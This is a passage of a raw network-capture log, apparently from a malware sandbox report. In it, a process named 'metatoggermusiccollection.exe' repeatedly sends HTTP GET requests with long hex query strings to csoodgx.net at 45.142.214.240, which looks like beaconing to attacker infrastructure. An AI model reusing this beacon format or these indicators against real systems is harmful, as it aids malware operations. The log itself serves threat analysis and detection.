                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:37.795223951 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:37 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          63192.168.2.54978045.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:38.127295971 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:38.436038971 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:38 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          64192.168.2.54978145.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:38.765183926 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:39.078337908 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:38 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          65192.168.2.54978245.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:39.408448935 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:39.723113060 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:39 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          66192.168.2.54978345.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:40.060558081 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:40.373763084 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:40 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
                                                                          Mar 29, 2024 12:10:40.482719898 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:40.780415058 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:40 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
                                                                          Mar 29, 2024 12:10:40.888750076 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:41.193089008 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:41 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          67192.168.2.54978445.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:41.536693096 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:41.836251974 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:41 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          68192.168.2.54978545.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:42.173449993 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:42.475572109 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:42 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          69192.168.2.54978645.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:42.810591936 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:43.107403040 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:42 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
                                                                          Mar 29, 2024 12:10:43.222188950 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:43.525003910 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:43 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          70192.168.2.54978745.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:43.860066891 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:44.182424068 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:44 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          71192.168.2.54978845.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:45.795139074 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:46.095664024 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:45 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          72192.168.2.54978945.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:46.435554028 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:46.739310026 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:46 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          73192.168.2.54979045.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:47.079530954 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:47.384391069 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:47 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          74192.168.2.54979145.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:47.724355936 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:48.019238949 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:47 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          75192.168.2.54979245.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:48.356929064 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:48.680064917 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:48 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          76192.168.2.54979345.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:49.012408018 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:49.311074972 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:49 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          77192.168.2.54979445.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:49.656204939 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:49.952958107 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:49 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          78192.168.2.54979545.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:50.283368111 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:50.587368011 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:50 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          79192.168.2.54979645.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:50.920566082 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:51.221873999 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:51 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          80192.168.2.54979745.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:51.565444946 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:51.887362957 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:51 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          81192.168.2.54979845.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:52.218008041 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:52.519275904 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:52 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          82192.168.2.54979945.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:52.864072084 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:53.167071104 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:53 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          83192.168.2.54980045.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:53.501609087 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:53.809508085 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:53 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
